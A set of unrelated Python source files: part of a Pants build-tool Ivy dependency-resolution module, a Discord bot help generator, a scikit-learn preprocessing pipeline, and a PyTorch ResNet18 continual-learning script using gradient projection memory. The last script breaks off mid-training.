for path, hardlink in six.iteritems(hardlink_map):
if path == hardlink:
# Skip paths that aren't going to be hardlinked.
continue
safe_mkdir(os.path.dirname(hardlink))
safe_hardlink_or_copy(path, hardlink)
# (re)create the classpath with all of the paths
with safe_open(outpath, 'w') as outfile:
outfile.write(':'.join(OrderedSet(hardlink_map.values())))
return dict(hardlink_map)
@classmethod
def xml_report_path(cls, resolution_cache_dir, resolve_hash_name, conf):
"""The path to the xml report ivy creates after a retrieve.
:API: public
:param string cache_dir: The path of the ivy cache dir used for resolves.
:param string resolve_hash_name: Hash from the Cache key from the VersionedTargetSet used for
resolution.
:param string conf: The ivy conf name (e.g. "default").
:returns: The report path.
:rtype: string
"""
return os.path.join(resolution_cache_dir, '{}-{}-{}.xml'.format(IvyUtils.INTERNAL_ORG_NAME,
resolve_hash_name, conf))
@classmethod
def parse_xml_report(cls, conf, path):
"""Parse the ivy xml report corresponding to the name passed to ivy.
:API: public
:param string conf: the ivy conf name (e.g. "default")
:param string path: The path to the ivy report file.
:returns: The info in the xml report.
:rtype: :class:`IvyInfo`
:raises: :class:`IvyResolveMappingError` if no report exists.
"""
if not os.path.exists(path):
raise cls.IvyResolveReportError('Missing expected ivy output file {}'.format(path))
logger.debug("Parsing ivy report {}".format(path))
ret = IvyInfo(conf)
etree = ET.parse(path)
doc = etree.getroot()
for module in doc.findall('dependencies/module'):
org = module.get('organisation')
name = module.get('name')
for revision in module.findall('revision'):
rev = revision.get('name')
callers = []
for caller in revision.findall('caller'):
callers.append(IvyModuleRef(caller.get('organisation'),
caller.get('name'),
caller.get('callerrev')))
for artifact in revision.findall('artifacts/artifact'):
classifier = artifact.get('extra-classifier')
ext = artifact.get('ext')
ivy_module_ref = IvyModuleRef(org=org, name=name, rev=rev,
classifier=classifier, ext=ext)
artifact_cache_path = artifact.get('location')
ivy_module = IvyModule(ivy_module_ref, artifact_cache_path, tuple(callers))
ret.add_module(ivy_module)
return ret
@classmethod
def generate_ivy(cls, targets, jars, excludes, ivyxml, confs, resolve_hash_name=None,
pinned_artifacts=None, jar_dep_manager=None):
if not resolve_hash_name:
resolve_hash_name = Target.maybe_readable_identify(targets)
return cls._generate_resolve_ivy(jars, excludes, ivyxml, confs, resolve_hash_name, pinned_artifacts,
jar_dep_manager)
@classmethod
def _generate_resolve_ivy(cls, jars, excludes, ivyxml, confs, resolve_hash_name, pinned_artifacts=None,
jar_dep_manager=None):
org = IvyUtils.INTERNAL_ORG_NAME
name = resolve_hash_name
extra_configurations = [conf for conf in confs if conf and conf != 'default']
jars_by_key = OrderedDict()
for jar in jars:
jars = jars_by_key.setdefault((jar.org, jar.name), [])
jars.append(jar)
manager = jar_dep_manager or JarDependencyManagement.global_instance()
artifact_set = PinnedJarArtifactSet(pinned_artifacts) # Copy, because we're modifying it.
for jars in jars_by_key.values():
for i, dep in enumerate(jars):
direct_coord = M2Coordinate.create(dep)
managed_coord = artifact_set[direct_coord]
if direct_coord.rev != managed_coord.rev:
# It may be necessary to actually change the version number of the jar we want to resolve
# here, because overrides do not apply directly (they are exclusively transitive). This is
# actually a good thing, because it gives us more control over what happens.
coord = manager.resolve_version_conflict(managed_coord, direct_coord, force=dep.force)
jars[i] = dep.copy(rev=coord.rev)
elif dep.force:
# If this dependency is marked as 'force' and there is no version conflict, use the normal
# pants behavior for 'force'.
artifact_set.put(direct_coord)
dependencies = [cls._generate_jar_template(jars) for jars in jars_by_key.values()]
# As it turns out force is not transitive - it only works for dependencies pants knows about
# directly (declared in BUILD files - present in generated ivy.xml). The user-level ivy docs
# don't make this clear [1], but the source code docs do (see isForce docs) [2]. I was able to
# edit the generated ivy.xml and use the override feature [3] though and that does work
# transitively as you'd hope.
#
# [1] http://ant.apache.org/ivy/history/2.3.0/settings/conflict-managers.html
# [2] https://svn.apache.org/repos/asf/ant/ivy/core/branches/2.3.0/
# src/java/org/apache/ivy/core/module/descriptor/DependencyDescriptor.java
# [3] http://ant.apache.org/ivy/history/2.3.0/ivyfile/override.html
overrides = [cls._generate_override_template(_coord) for _coord in artifact_set]
excludes = [cls._generate_exclude_template(exclude) for exclude in excludes]
template_data = TemplateData(
org=org,
module=name,
extra_configurations=extra_configurations,
dependencies=dependencies,
excludes=excludes,
overrides=overrides)
template_relpath = os.path.join('templates', 'ivy_utils', 'ivy.xml.mustache')
cls._write_ivy_xml_file(ivyxml, template_data, template_relpath)
@classmethod
def generate_fetch_ivy(cls, jars, ivyxml, confs, resolve_hash_name):
"""Generates an ivy xml with all jars marked as intransitive using the all conflict manager."""
org = IvyUtils.INTERNAL_ORG_NAME
name = resolve_hash_name
extra_configurations = [conf for conf in confs if conf and conf != 'default']
# Use org name _and_ rev so that we can have dependencies with different versions. This will
# allow for batching fetching if we want to do that.
jars_by_key = OrderedDict()
for jar in jars:
jars_by_key.setdefault((jar.org, jar.name, jar.rev), []).append(jar)
dependencies = [cls._generate_fetch_jar_template(_jars) for _jars in jars_by_key.values()]
template_data = TemplateData(org=org,
module=name,
extra_configurations=extra_configurations,
dependencies=dependencies)
template_relpath = os.path.join('templates', 'ivy_utils', 'ivy_fetch.xml.mustache')
cls._write_ivy_xml_file(ivyxml, template_data, template_relpath)
@classmethod
def _write_ivy_xml_file(cls, ivyxml, template_data, template_relpath):
template_text = pkgutil.get_data(__name__, template_relpath).decode('utf-8')
generator = Generator(template_text, lib=template_data)
with safe_open(ivyxml, 'w') as output:
generator.write(output)
@classmethod
def calculate_classpath(cls, targets):
"""Creates a consistent classpath and list of excludes for the passed targets.
It also modifies the JarDependency objects' excludes to contain all the jars excluded by
provides.
:param iterable targets: List of targets to collect JarDependencies and excludes from.
:returns: A pair of a list of JarDependencies, and a set of excludes to apply globally.
"""
jars = OrderedDict()
global_excludes = set()
provide_excludes = set()
targets_processed = set()
# Support the ivy force concept when we sanely can for internal dep conflicts.
# TODO(John Sirois): Consider supporting / implementing the configured ivy revision picking
# strategy generally.
def add_jar(jar):
# TODO(John Sirois): Maven allows for depending on an artifact at one rev and one of its
# attachments (classified artifacts) at another. Ivy does not, allow this, the dependency
# can carry only 1 rev and that hosts multiple artifacts for that rev. This conflict
# resolution happens at the classifier level, allowing skew in a
# multi-artifact/multi-classifier dependency. We only find out about the skew later in
# `_generate_jar_template` below which will blow up with a conflict. Move this logic closer
# together to get a more clear validate, then emit ivy.xml then resolve flow instead of the
# spread-out validations happening here.
# See: https://github.com/pantsbuild/pants/issues/2239
coordinate = (jar.org, jar.name, jar.classifier)
existing = jars.get(coordinate)
jars[coordinate] = jar if not existing else cls._resolve_conflict(existing=existing,
proposed=jar)
def collect_jars(target):
if isinstance(target, JarLibrary):
for jar in target.jar_dependencies:
add_jar(jar)
def collect_excludes(target):
target_excludes = target.payload.get_field_value('excludes')
if target_excludes:
global_excludes.update(target_excludes)
def collect_provide_excludes(target):
if not (isinstance(target, ExportableJvmLibrary) and target.provides):
return
logger.debug('Automatically excluding jar {}.{}, which is provided by {}'.format(
target.provides.org, target.provides.name, target))
provide_excludes.add(Exclude(org=target.provides.org, name=target.provides.name))
def collect_elements(target):
targets_processed.add(target)
collect_jars(target)
collect_excludes(target)
collect_provide_excludes(target)
for target in targets:
target.walk(collect_elements, predicate=lambda target: target not in targets_processed)
# If a source dep is exported (ie, has a provides clause), it should always override
# remote/binary versions of itself, ie "round trip" dependencies.
# TODO: Move back to applying provides excludes as target-level excludes when they are no
# longer global.
if provide_excludes:
additional_excludes = tuple(provide_excludes)
new_jars = OrderedDict()
for coordinate, jar in jars.items():
new_jars[coordinate] = jar.copy(excludes=jar.excludes + additional_excludes)
jars = new_jars
return list(jars.values()), global_excludes
@classmethod
def _resolve_conflict(cls, existing, proposed):
if existing.rev is None:
return proposed
if proposed.rev is None:
return existing
if proposed == existing:
if proposed.force:
return proposed
return existing
elif existing.force and proposed.force:
raise cls.IvyResolveConflictingDepsError('Cannot force {}#{};{} to both rev {} and {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
elif existing.force:
logger.debug('Ignoring rev {} for {}#{};{} already forced to {}'.format(
proposed.rev, proposed.org, proposed.name, proposed.classifier or '', existing.rev
))
return existing
elif proposed.force:
logger.debug('Forcing {}#{};{} from {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
return proposed
else:
if Revision.lenient(proposed.rev) > Revision.lenient(existing.rev):
logger.debug('Upgrading {}#{};{} from rev {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev,
))
return proposed
else:
return existing
@classmethod
def _generate_jar_template(cls, jars):
global_dep_attributes = set(Dependency(org=jar.org,
name=jar.name,
rev=jar.rev,
mutable=jar.mutable,
force=jar.force,
transitive=jar.transitive)
for jar in jars)
if len(global_dep_attributes) != 1:
# TODO: Need to provide information about where these came from - could be
# far-flung JarLibrary targets. The jars here were collected from targets via
# `calculate_classpath` above so executing this step there instead may make more
# sense.
conflicting_dependencies = sorted(str(g) for g in global_dep_attributes)
raise cls.IvyResolveConflictingDepsError('Found conflicting dependencies:\n\t{}'
.format('\n\t'.join(conflicting_dependencies)))
jar_attributes = global_dep_attributes.pop()
excludes = set()
for jar in jars:
excludes.update(jar.excludes)
any_have_url = False
artifacts = OrderedDict()
for jar in jars:
ext = jar.ext
url = jar.get_url()
if url:
any_have_url = True
classifier = jar.classifier
artifact = Artifact(name=jar.name,
type_=ext or 'jar',
ext=ext,
url=url,
classifier=classifier)
artifacts[(ext, url, classifier)] = artifact
template = TemplateData(
org=jar_attributes.org,
module=jar_attributes.name,
version=jar_attributes.rev,
mutable=jar_attributes.mutable,
force=jar_attributes.force,
transitive=jar_attributes.transitive,
artifacts=list(artifacts.values()),
any_have_url=any_have_url,
excludes=[cls._generate_exclude_template(exclude) for exclude in excludes])
return template
@classmethod
def _generate_fetch_jar_template(cls, jars):
global_dep_attributes = set(Dependency(org=jar.org,
name=jar.name,
rev=jar.rev,
transitive=False,
mutable=jar.mutable,
force=True)
for jar in jars)
if len(global_dep_attributes) != 1:
# If we batch fetches and assume conflict manager all, we could ignore these.
# Leaving this here for now.
conflicting_dependencies = sorted(str(g) for g in global_dep_attributes)
raise cls.IvyResolveConflictingDepsError('Found conflicting dependencies:\n\t{}'
.format('\n\t'.join(conflicting_dependencies)))
jar_attributes = global_dep_attributes.pop()
any_have_url = False
artifacts = OrderedDict()
for jar in jars:
ext = jar.ext
url = jar.get_url()
if url:
any_have_url = True
classifier = jar.classifier
artifact = Artifact(name=jar.name,
type_=ext or 'jar',
ext=ext,
url=url,
classifier=classifier)
artifacts[(ext, url, classifier)] = artifact
template = TemplateData(
org=jar_attributes.org,
module=jar_attributes.name,
version=jar_attributes.rev,
mutable=jar_attributes.mutable,
artifacts=list(artifacts.values()),
any_have_url=any_have_url,
excludes=[])
return template
|
the-stack_106_16838
|
from logging import WARN
from discord import Embed
from discord.ext.commands import Group
from yaml import YAMLError, safe_load
from core.api import split_camel
def __resolve_alias(cmd):
return set([cmd.name] + cmd.aliases)
def get_help(bot) -> tuple:
"""
Return a general Embed onject for help.
:param bot: the Yasen instance.
:return: a discord Embed object for general help.
"""
from bot import __title__ as name
prefix = bot.prefix
description = f'For detailed help please use {prefix}help [command_name]'
embed = Embed(colour=bot.colour, description=description)
embed.set_author(name=f'{name} Help', icon_url=bot.user.avatar_url)
cog_cmd = {}
all_help = {}
for command in bot.commands.values():
_name = command.name
for n in __resolve_alias(command):
all_help[n] = single_help(bot, command, _name)
cog_name = ' '.join(split_camel(command.cog_name) + ['Commands'])
if cog_name not in cog_cmd:
cog_cmd[cog_name] = []
cog_cmd[cog_name].append(f'`{_name}`')
if isinstance(command, Group):
for sub in command.commands.values():
_child_name = sub.name
full_name = f'{_name} {_child_name}'
all_help[full_name] = single_help(bot, sub, full_name)
cog_cmd[cog_name].append(full_name)
for key in sorted(cog_cmd.keys()):
embed.add_field(
name=key, value=', '.join(set(cog_cmd[key])), inline=False
)
return embed, all_help
def single_help(bot, cmd, cmd_name) -> Embed:
"""
Generate help embed for a given embed.
:return: the embed object for the given command.
"""
doc = cmd.help
try:
help_dict = safe_load(doc)
except (YAMLError, AttributeError) as e:
bot.logger.log(WARN, str(e))
return Embed(colour=bot.colour, description=doc)
else:
embed = Embed(
colour=bot.colour, description=help_dict.pop('Description')
)
embed.set_author(name=cmd_name, icon_url=bot.user.avatar_url)
if cmd.aliases:
embed.add_field(name='Aliases', value=f'`{", ".join(cmd.aliases)}`')
for key, val in help_dict.items():
try:
val = val.format(prefix=bot.prefix)
except KeyError:
val = val.replace('{prefix}', bot.prefix)
embed.add_field(name=key, value=val, inline=False)
return embed
|
the-stack_106_16840
|
#==============================================================================
# Import packages
#==============================================================================
import numpy as np
import pandas as pd
# Utilities
from sklearn.utils import resample
# Transformer to select a subset of the Pandas DataFrame columns
from sklearn.base import BaseEstimator, TransformerMixin
# Pipeline
from sklearn.pipeline import Pipeline
from sklearn.pipeline import FeatureUnion
# Data preprocessing
from sklearn.preprocessing import Imputer
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import PolynomialFeatures
# Feature selection
from sklearn.feature_selection import VarianceThreshold
#==============================================================================
# Custom transformer classes
#==============================================================================
# Class to select columns
class FeatureSelector(BaseEstimator, TransformerMixin):
def __init__(self, attribute_names):
self.attribute_names = attribute_names
def fit(self, x):
return self
def transform(self, x):
return x[self.attribute_names].values
# Class to impute textual category
class ImputerTextualCategory(BaseEstimator, TransformerMixin):
def __init__(self):
pass
def fit(self, df, y=None):
return self
def transform(self, x):
return pd.DataFrame(x).apply(lambda x: x.fillna(x.value_counts().index[0]))
# Class to encode labels across multiple columns
class MultiColumnLabelEncoder(BaseEstimator, TransformerMixin):
def __init__(self, astype=int):
self.astype = astype
def fit(self, x, y=None):
return self
def transform(self, x, y=None):
if self.astype == int:
return pd.DataFrame(x).apply(LabelEncoder().fit_transform)
else:
return pd.DataFrame(x).apply(LabelEncoder().fit_transform).astype(str)
# Class for one-hot encoding of textual categorical values and optionally
# drop the first dummy feature (if multi-collinearity is a concern)
class GetDummies(BaseEstimator, TransformerMixin):
def __init__(self, drop_first=False):
self.drop_first = drop_first
def fit(self, x, y=None):
return self
def transform(self, x):
return pd.get_dummies(x, drop_first=self.drop_first)
#==============================================================================
# Initialization Settings
#==============================================================================
ID = 'id'
Y = 'y'
DIR = "input"
DATAFILE = "{0}/data_example.csv".format(DIR)
NTRAINROWS = None # Number of rows of data file to read; None reads all rows
UPSAMPLEPCT = .4 # Percent of samples to have positive class; 0 <= pct < 1
SEED = 42 # Seed state for reproducibility
VARTHRESHOLD = .001 # Minimum variability allowed for features
#==============================================================================
# Data import
#==============================================================================
df = pd.read_csv(DATAFILE, index_col=ID, header=0, nrows=NTRAINROWS)
# Separate majority and minority classes
df_majority = df[df[Y]==0]
df_minority = df[df[Y]==1]
# Upsample minority class with replacement
df_minority_sampled = resample(df_minority,
replace=True,
n_samples=int(UPSAMPLEPCT*df_majority.shape[0]/(1-UPSAMPLEPCT)),
random_state=SEED)
# Combine majority class with upsampled minority class
df_sampled = pd.concat([df_majority, df_minority_sampled])
# Shuffle all the samples
df_sampled = resample(df_sampled, replace=False, random_state=SEED)
# Separate y and X variables
y = df_sampled[Y]
X = df_sampled.loc[:, df_sampled.columns != Y]
#==============================================================================
# Preprocessing pipeline
#==============================================================================
# Select features: binary ('bin'), numerical categorical ('numcat'),
# textual categorical ('strcat'), and numerical ('num').
#
# bin: 1. these are features that have two categories labeled either 1 or 0
# === 2. we want to keep the columns as they are
#
# numcat: 1. these are features that have at least three numerical categories
# ====== 2. we want to transform them into dummy variables
#
# txtcat: 1. these are features that have at least three textual categories
# ====== 2. we want to transform them into dummy variables
#
# num: 1. these features that are numerical such as integers and floats
# === 2. we want to normalize these values
bin_features = [f for f in X.columns if f[3:len(f)] == 'bin']
numcat_features = [f for f in X.columns if f[3:len(f)] == 'numcat']
txtcat_features = [f for f in X.columns if f[3:len(f)] == 'txtcat']
num_features = [f for f in X.columns if f[3:len(f)] == 'num']
# 1. Select features
# 2. Impute missing values with the median
bin_pipeline = Pipeline([
('selector', FeatureSelector(bin_features)),
('imputer', Imputer(missing_values=np.nan, strategy='median', axis=0)),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# 1. Select features
# 2. Impute missing values with the median
# 3. Encode each feature and set the type to string so that the GetDummies class
# (which uses pandas.get_dummies) can transform labels into dummy variables
# 4. Create one-hot encoding for each feature and (due to multi-collinearity concerns)
# remove the first dummy feature to retain n-1 dummy features
numcat_pipeline = Pipeline([
('selector', FeatureSelector(np.array(numcat_features))),
('imputer', Imputer(missing_values=np.nan, strategy='median', axis=0)),
('labelencoder', MultiColumnLabelEncoder(astype=str)),
('getdummies', GetDummies(drop_first=True)),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# 1. Select features
# 2. Impute missing values with the most frequent
# 3. Create one-hot encoding for each feature and (for multi-collinearity concerns)
# remove the first dummy feature to retain n-1 dummy features
txtcat_pipeline = Pipeline([
('selector', FeatureSelector(np.array(txtcat_features))),
('imputer', ImputerTextualCategory()),
('getdummies', GetDummies(drop_first=True)),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# 1. Select features
# 2. Impute missing values with the mean
# 3. Scale the values using standard normalization: (x-mean(x))/stdev(x)
num_pipeline = Pipeline([
('selector', FeatureSelector(num_features)),
('imputer', Imputer(missing_values=np.nan, strategy='mean', axis=0)),
('poly', PolynomialFeatures(2, interaction_only=False)),
('normalizer', StandardScaler()),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# Combine all pipelines into a single pipeline
full_pipeline = FeatureUnion(transformer_list=[
("bin_pipeline", bin_pipeline),
("numcat_pipeline", numcat_pipeline),
("txtcat_pipeline", txtcat_pipeline),
("num_pipeline", num_pipeline),
])
# Execute entire pipeline. If the output is a sparse matrix,
# then convert it to a dense matrix using the toarray method.
try:
X = pd.DataFrame(full_pipeline.fit_transform(X).toarray())
except AttributeError:
X = pd.DataFrame(full_pipeline.fit_transform(X))
#==============================================================================
# The End
#==============================================================================
|
the-stack_106_16842
|
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.functional import relu, avg_pool2d
from torch.autograd import Variable
import torchvision
from torchvision import datasets, transforms
import os
import os.path
from collections import OrderedDict
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sn
import pandas as pd
import random
import pdb
import argparse,time
import math
from copy import deepcopy
## Define ResNet18 model
def compute_conv_output_size(Lin,kernel_size,stride=1,padding=0,dilation=1):
return int(np.floor((Lin+2*padding-dilation*(kernel_size-1)-1)/float(stride)+1))
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv7x7(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=7, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(in_planes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, track_running_stats=False)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, track_running_stats=False)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion * planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1,
stride=stride, bias=False),
nn.BatchNorm2d(self.expansion * planes, track_running_stats=False)
)
self.act = OrderedDict()
self.count = 0
def forward(self, x):
self.count = self.count % 2
self.act['conv_{}'.format(self.count)] = x
self.count +=1
out = relu(self.bn1(self.conv1(x)))
self.count = self.count % 2
self.act['conv_{}'.format(self.count)] = out
self.count +=1
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, taskcla, nf):
super(ResNet, self).__init__()
self.in_planes = nf
self.conv1 = conv3x3(3, nf * 1, 1)
self.bn1 = nn.BatchNorm2d(nf * 1, track_running_stats=False)
self.layer1 = self._make_layer(block, nf * 1, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, nf * 2, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, nf * 4, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, nf * 8, num_blocks[3], stride=2)
self.taskcla = taskcla
self.linear=torch.nn.ModuleList()
for t, n in self.taskcla:
self.linear.append(nn.Linear(nf * 8 * block.expansion * 4, n, bias=False))
self.act = OrderedDict()
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
bsz = x.size(0)
self.act['conv_in'] = x.view(bsz, 3, 32, 32)
out = relu(self.bn1(self.conv1(x.view(bsz, 3, 32, 32))))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = avg_pool2d(out, 2)
out = out.view(out.size(0), -1)
y=[]
for t,i in self.taskcla:
y.append(self.linear[t](out))
return y
def ResNet18(taskcla, nf=32):
return ResNet(BasicBlock, [2, 2, 2, 2], taskcla, nf)
def get_model(model):
return deepcopy(model.state_dict())
def set_model_(model,state_dict):
model.load_state_dict(deepcopy(state_dict))
return
def adjust_learning_rate(optimizer, epoch, args):
for param_group in optimizer.param_groups:
if (epoch ==1):
param_group['lr']=args.lr
else:
param_group['lr'] /= args.lr_factor
def train(args, model, device, x,y, optimizer,criterion, task_id):
model.train()
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
# Loop batches
for i in range(0,len(r),args.batch_size_train):
if i+args.batch_size_train<=len(r): b=r[i:i+args.batch_size_train]
else: b=r[i:]
data = x[b]
data, target = data.to(device), y[b].to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output[task_id], target)
loss.backward()
optimizer.step()
def train_projected(args,model,device,x,y,optimizer,criterion,feature_mat,task_id):
model.train()
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
# Loop batches
for i in range(0,len(r),args.batch_size_train):
if i+args.batch_size_train<=len(r): b=r[i:i+args.batch_size_train]
else: b=r[i:]
data = x[b]
data, target = data.to(device), y[b].to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output[task_id], target)
loss.backward()
# Gradient Projections
kk = 0
for k, (m,params) in enumerate(model.named_parameters()):
if len(params.size())==4:
sz = params.grad.data.size(0)
params.grad.data = params.grad.data - torch.mm(params.grad.data.view(sz,-1),\
feature_mat[kk]).view(params.size())
kk+=1
elif len(params.size())==1 and task_id !=0:
params.grad.data.fill_(0)
optimizer.step()
def test(args, model, device, x, y, criterion, task_id):
model.eval()
total_loss = 0
total_num = 0
correct = 0
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
with torch.no_grad():
# Loop batches
for i in range(0,len(r),args.batch_size_test):
if i+args.batch_size_test<=len(r): b=r[i:i+args.batch_size_test]
else: b=r[i:]
data = x[b]
data, target = data.to(device), y[b].to(device)
output = model(data)
loss = criterion(output[task_id], target)
pred = output[task_id].argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
total_loss += loss.data.cpu().numpy().item()*len(b)
total_num += len(b)
acc = 100. * correct / total_num
final_loss = total_loss / total_num
return final_loss, acc
def get_representation_matrix_ResNet18 (net, device, x, y=None):
# Collect activations by forward pass
net.eval()
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
b=r[0:100] # ns=100 examples
example_data = x[b]
example_data = example_data.to(device)
example_out = net(example_data)
act_list =[]
act_list.extend([net.act['conv_in'],
net.layer1[0].act['conv_0'], net.layer1[0].act['conv_1'], net.layer1[1].act['conv_0'], net.layer1[1].act['conv_1'],
net.layer2[0].act['conv_0'], net.layer2[0].act['conv_1'], net.layer2[1].act['conv_0'], net.layer2[1].act['conv_1'],
net.layer3[0].act['conv_0'], net.layer3[0].act['conv_1'], net.layer3[1].act['conv_0'], net.layer3[1].act['conv_1'],
net.layer4[0].act['conv_0'], net.layer4[0].act['conv_1'], net.layer4[1].act['conv_0'], net.layer4[1].act['conv_1']])
batch_list = [10,10,10,10,10,10,10,10,50,50,50,100,100,100,100,100,100] #scaled
# network arch
stride_list = [1, 1,1,1,1, 2,1,1,1, 2,1,1,1, 2,1,1,1]
map_list = [32, 32,32,32,32, 32,16,16,16, 16,8,8,8, 8,4,4,4]
in_channel = [ 3, 20,20,20,20, 20,40,40,40, 40,80,80,80, 80,160,160,160]
pad = 1
sc_list=[5,9,13]
p1d = (1, 1, 1, 1)
mat_final=[] # list containing GPM Matrices
mat_list=[]
mat_sc_list=[]
for i in range(len(stride_list)):
if i==0:
ksz = 3
else:
ksz = 3
bsz=batch_list[i]
st = stride_list[i]
k=0
s=compute_conv_output_size(map_list[i],ksz,stride_list[i],pad)
mat = np.zeros((ksz*ksz*in_channel[i],s*s*bsz))
act = F.pad(act_list[i], p1d, "constant", 0).detach().cpu().numpy()
for kk in range(bsz):
for ii in range(s):
for jj in range(s):
mat[:,k]=act[kk,:,st*ii:ksz+st*ii,st*jj:ksz+st*jj].reshape(-1)
k +=1
mat_list.append(mat)
# For Shortcut Connection
if i in sc_list:
k=0
s=compute_conv_output_size(map_list[i],1,stride_list[i])
mat = np.zeros((1*1*in_channel[i],s*s*bsz))
act = act_list[i].detach().cpu().numpy()
for kk in range(bsz):
for ii in range(s):
for jj in range(s):
mat[:,k]=act[kk,:,st*ii:1+st*ii,st*jj:1+st*jj].reshape(-1)
k +=1
mat_sc_list.append(mat)
ik=0
for i in range (len(mat_list)):
mat_final.append(mat_list[i])
if i in [6,10,14]:
mat_final.append(mat_sc_list[ik])
ik+=1
print('-'*30)
print('Representation Matrix')
print('-'*30)
for i in range(len(mat_final)):
print ('Layer {} : {}'.format(i+1,mat_final[i].shape))
print('-'*30)
return mat_final
def update_GPM (model, mat_list, threshold, feature_list=[],):
print ('Threshold: ', threshold)
if not feature_list:
# After First Task
for i in range(len(mat_list)):
activation = mat_list[i]
U,S,Vh = np.linalg.svd(activation, full_matrices=False)
# criteria (Eq-5)
sval_total = (S**2).sum()
sval_ratio = (S**2)/sval_total
r = np.sum(np.cumsum(sval_ratio)<threshold[i]) #+1
feature_list.append(U[:,0:r])
else:
for i in range(len(mat_list)):
activation = mat_list[i]
U1,S1,Vh1=np.linalg.svd(activation, full_matrices=False)
sval_total = (S1**2).sum()
# Projected Representation (Eq-8)
act_hat = activation - np.dot(np.dot(feature_list[i],feature_list[i].transpose()),activation)
U,S,Vh = np.linalg.svd(act_hat, full_matrices=False)
# criteria (Eq-9)
sval_hat = (S**2).sum()
sval_ratio = (S**2)/sval_total
accumulated_sval = (sval_total-sval_hat)/sval_total
r = 0
for ii in range (sval_ratio.shape[0]):
if accumulated_sval < threshold[i]:
accumulated_sval += sval_ratio[ii]
r += 1
else:
break
if r == 0:
print ('Skip Updating GPM for layer: {}'.format(i+1))
continue
# update GPM
Ui=np.hstack((feature_list[i],U[:,0:r]))
if Ui.shape[1] > Ui.shape[0] :
feature_list[i]=Ui[:,0:Ui.shape[0]]
else:
feature_list[i]=Ui
print('-'*40)
print('Gradient Constraints Summary')
print('-'*40)
for i in range(len(feature_list)):
print ('Layer {} : {}/{}'.format(i+1,feature_list[i].shape[1], feature_list[i].shape[0]))
print('-'*40)
return feature_list
def main(args):
tstart=time.time()
## Device Setting
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
## Load CIFAR100 DATASET
from dataloader import five_datasets as data_loader
data,taskcla,inputsize=data_loader.get(pc_valid=args.pc_valid)
acc_matrix=np.zeros((5,5))
criterion = torch.nn.CrossEntropyLoss()
task_id = 0
task_list = []
for k,ncla in taskcla:
# specify threshold hyperparameter
threshold = np.array([0.965] * 20)
print('*'*100)
print('Task {:2d} ({:s})'.format(k,data[k]['name']))
print('*'*100)
xtrain=data[k]['train']['x']
ytrain=data[k]['train']['y']
xvalid=data[k]['valid']['x']
yvalid=data[k]['valid']['y']
xtest =data[k]['test']['x']
ytest =data[k]['test']['y']
task_list.append(k)
lr = args.lr
best_loss=np.inf
print ('-'*40)
print ('Task ID :{} | Learning Rate : {}'.format(task_id, lr))
print ('-'*40)
if task_id==0:
model = ResNet18(taskcla,20).to(device) # base filters: 20
best_model=get_model(model)
feature_list =[]
optimizer = optim.SGD(model.parameters(), lr=lr)
for epoch in range(1, args.n_epochs+1):
# Train
clock0=time.time()
train(args, model, device, xtrain, ytrain, optimizer, criterion, k)
clock1=time.time()
tr_loss,tr_acc = test(args, model, device, xtrain, ytrain, criterion, k)
print('Epoch {:3d} | Train: loss={:.3f}, acc={:5.1f}% | time={:5.1f}ms |'.format(epoch,\
tr_loss,tr_acc, 1000*(clock1-clock0)),end='')
# Validate
valid_loss,valid_acc = test(args, model, device, xvalid, yvalid, criterion, k)
print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss, valid_acc),end='')
# Adapt lr
if valid_loss<best_loss:
best_loss=valid_loss
best_model=get_model(model)
patience=args.lr_patience
print(' *',end='')
else:
patience-=1
if patience<=0:
lr/=args.lr_factor
print(' lr={:.1e}'.format(lr),end='')
if lr<args.lr_min:
print()
break
patience=args.lr_patience
adjust_learning_rate(optimizer, epoch, args)
print()
